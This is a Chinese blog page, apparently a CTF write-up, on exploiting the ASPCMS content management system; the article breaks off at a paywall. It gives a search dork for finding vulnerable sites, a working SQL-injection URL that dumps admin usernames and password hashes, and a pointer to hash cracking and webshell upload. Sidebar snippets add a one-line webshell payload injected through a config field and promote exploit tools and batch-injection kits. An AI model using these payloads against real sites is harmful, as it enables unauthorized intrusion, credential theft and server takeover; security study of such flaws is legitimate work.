【WEB】aspcms漏洞利用

最新推荐文章于 2024-08-04 11:12:03 发布
最新推荐文章于 2024-08-04 11:12:03 发布
阅读量1.8w 收藏 11
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81810940
版权
这篇博客介绍了ASPCMS系统的漏洞利用方法,包括通过谷歌搜索关键字找到漏洞,利用SQL注入获取用户信息,以及社工方法登录后台。还探讨了更推荐的原理解决方式,分析了源码中的问题,利用Cookie伪造登录,并发现了一句话木马,最终成功连接到WebShell。
摘要由CSDN通过智能技术生成

【社工方法】(不推荐)

1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人
2.接着利用注入漏洞
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user


然后登陆https://www.somd5.com/来解md5

3.去登陆后台 ,登陆成功
然后搜了一下aspcms 的文件上传get webshell 
https://www.i0day.com/1595.html
我们来尝试一下
我们点击修改
 

最低0.47元/天 解锁文章
pcy190
关注
专栏目录
【漏洞复现】AspCMS commentList.asp SQL注入
失心少年
09-14 1460
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
【漏洞复现】闪灵CMS_5.0后台htaccess攻击Getshell
Fly_鹏程万里
06-20 93
闪灵CMS 5.0后台网站安全->安全设置界面规定了允许上传的文件格式,且不允许管理员添加php、asp、cgi等格式,但是却忽略了.htaccess,攻击者可以添加htaccess文件格式,并构造一个恶意.htaccess文件使其将当前目录下的所有文件解析为php,然后上传一个图片木马文件到服务器,从而获取服务器的管理权限~
0day漏洞(aspcms)漏洞实战
weixin_49071539的博客
12-16 3529
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
ASPCMS漏洞之文件上传漏洞
最新发布
weixin_57240513的博客
08-04 333
ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。
ASPCMS 漏洞
weixin_69065643的博客
08-03 349
将slideTextStatus的值修改为1%25>
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 652
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞。
ASPCMS 漏洞详细教程
2201_75891821的博客
08-03 353
将slideTextStatus的值修改为1%25><%25Eval(Request(chr(65)))25><%25 放包(连接密码是a)然后用工具连接 成功连接。
常见cms漏洞之ASPCMS
ineedmoreMuQ的博客
08-03 386
漏洞复现,使用后台配置文件拿shell。
最新ASPCMS 0DAY利用工具(附VB源码)
03-25
ASPCMS 0DAY利用工具是一款专门针对ASPCMS系统的漏洞利用工具,它包含了VB(Visual Basic)源码,能够帮助安全研究人员或者攻击者理解并利用ASPCMS系统中的未公开漏洞,即所谓的0day漏洞。0day漏洞是指软件开发者...
【某CMS漏洞】SQL注入漏洞分析
HBohan的博客
04-27 1656
前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index.php [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xhTdHBVn-1651041211358)(https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/490ca1b2038f48148c14ac62455278ef~tplv-k
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞)
03-12
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞)
aspcms绕过进入后台
04-11
aspcms绕过进入后台
aspcms爆后台地址
05-17
aspcms爆后台地址,秒杀老版本,修改后台地址一样能跳到真实地址
批量注入ASPCMS获得管理后台权限
08-25
批量注入ASPCMS获得管理后台权限,很好的东西
aspcms 密码找回- aspcms后台密码忘记找回
07-25
aspcms 密码找回,aspcms后台密码忘记找回 源码下载后 ,ftp上传到网站根目录,执行文件,设置新的管理员密码,后台登录输入新的密码即可。
74cms漏洞EXP - -Web Vulnerability Databases
10-06
标题与描述中的“74cms漏洞EXP”指向的是一个针对74cms系统存在的安全漏洞的利用代码(EXP),这在网络安全领域通常被称为“Web Vulnerability Databases”中的一个实例。74cms是一款基于PHP和MySQL的网站内容管理...
复现 ASPCMS企业建站系统Cookies欺骗漏洞
记录并分享学习安全的知识点..
08-21 915
ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 ASPCMS2.0存在sql注入注入漏洞,可获得admin管理员用户的cookie值。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值